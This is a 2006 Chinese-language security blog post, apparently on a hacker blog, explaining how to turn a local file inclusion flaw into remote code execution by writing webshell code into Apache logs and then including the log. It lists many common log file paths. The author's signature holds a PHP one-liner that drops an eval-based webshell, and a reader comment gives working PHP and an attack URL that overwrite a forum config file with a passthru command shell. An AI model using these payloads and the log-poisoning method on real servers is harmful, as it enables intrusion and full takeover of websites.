-
2006-03-14
include包含日志
版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://superhei.blogbus.com/logs/2057692.html
include包含日志
<Simple PHP Blog <= 0.4.7.1 Remote Command Execution Exploit>[1]本身的漏洞没什么好看的,但是利用方法思路不错,虽然比较老的方法了(记得zizzy提过):就是先提交一个url:http://www.site.com/index.php?[webshellcode] 这样就把代码写入日志,然后include包含这个日志. 本地文件包含是就没有必要上传等拉.我们在发散一下,比如写如数据库 web程序的日志 ......
日志路径:
/var/log/httpd/access_log
/var/log/httpd/error_log
/apache/logs/error.log
/apache/logs/access.log
/apache/logs/error.log
/apache/logs/access.log
/apache/logs/error.log
/apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log[1]http://www.milw0rm.com/exploits/1581
随机文章:
Data:_URI_scheme 2008-06-21做人也要有那么点原则 2007-05-24祝愿我家lili早日康复 2007-02-09PunBB <= 1.2.13 Multiple Vulnerabilities 2006-10-31
收藏到:Del.icio.us
5up3rh3i'blog[提供有偿web代码安全审计服务]
MSN:SuperHei@ph4nt0m.org< ?fputs(fopen('heige.php','w+'),'< ?php @eval($_POST[c])? >');? >
搜索
最新文章
最新评论
链接
- #########
- 舒舒
- 二哥哥
- lanker
- fa1l3n
- axis
- swap
- lvhuana
- spr1t3
- 小沈
- fox
- 随便名字
- GaRY
- 7j
- RAyH4c
- #########
- PST
- HackTic
- 2600
- NGS
- cgisecurity
- owasp
- seclists
- argeniss
- phpsec
- bugtraq
- milw0rm
- phpsecure
- T.H.C
- webappsec
- phpsec'blog
- shiflett.org
- secyou
- Rst
- waraxe
- appsecinc
- northern-monkee
- blog.0x557
- ush
- EST
- securityreason
- infoshackers
- zwell
- spidynamics
- morx
- securitytracker
- modsecurity
- securiteam
- securiteam's blog
- phpclasse
- hardened-php
- csdn
- pro-hack
- f-secure
- rubyforge
- wisec
- redteam-pentesting
- alertpool
- blog.php-security
- timvw
- sqlsec
- sourceforge
- zeroknock
- qasec
- hacksafe
- smartsecurity
- gulftech
- thespanner
- nth-dimension.org.uk
- secweb
- cera.secniche.org
- swan不是牛
- Getahead
- xssed
- kuza55
- myappsecurity
- xssworm
- playhack
- hackademix
- manicode
- switch
- planet-websecurity
- disenchant.ch
- hackathology
- blueinfy
- bindshell
- net-square
- yaisb
- sirdarckcat
- googleonlinesecurity
- ########
- darkc0de
- darknet
- insecuremag
- serversniff
- tbs_pocket_knife
- seeknot
- php手册
- frsirt-google
- grip
- vuln.watch
- securitytracker.com
- connectionstrings
- oracle sec
- r00tin
- rawlab
- sommarskog
- taossa
- neilcar
- spl0it
- notsosecure.com
- dross
- ie's blog
- bluehat
评论
写入一个webshell也很不错。
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?=str_replace("?","!",passthru($cmd));?>");fclose($fp);?>
提交http://xxx.com/z.php?zizzy=<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?=str_replace(\"?\",\"!\",passthru(\$cmd));?>");fclose($fp);?>
这样更好,写到日志里,再执行,就得到个shell。
我也把我写的放到blog上了,<<关于php包含Apache日志的随想>>
http://2096.blogbus.com/logs/2006/03/2062335.html